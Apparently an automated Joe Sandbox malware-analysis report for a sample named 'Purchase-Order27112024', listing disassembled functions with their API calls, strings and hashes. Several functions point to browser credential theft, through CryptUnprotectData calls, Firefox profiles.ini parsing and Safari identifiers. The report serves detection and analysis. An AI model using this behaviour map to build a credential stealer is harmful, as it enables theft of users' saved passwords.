                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                      APIs
                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                      • API String ID: 2929817778-1134094380
                                                                                                      • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                      • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                      APIs
                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                      Strings
                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 829165378-0
                                                                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+8w@F8w@B8w
                                                                                                      • API String ID: 667068680-4123708296
                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                      • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                      • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                      • API String ID: 1607361635-601624466
                                                                                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
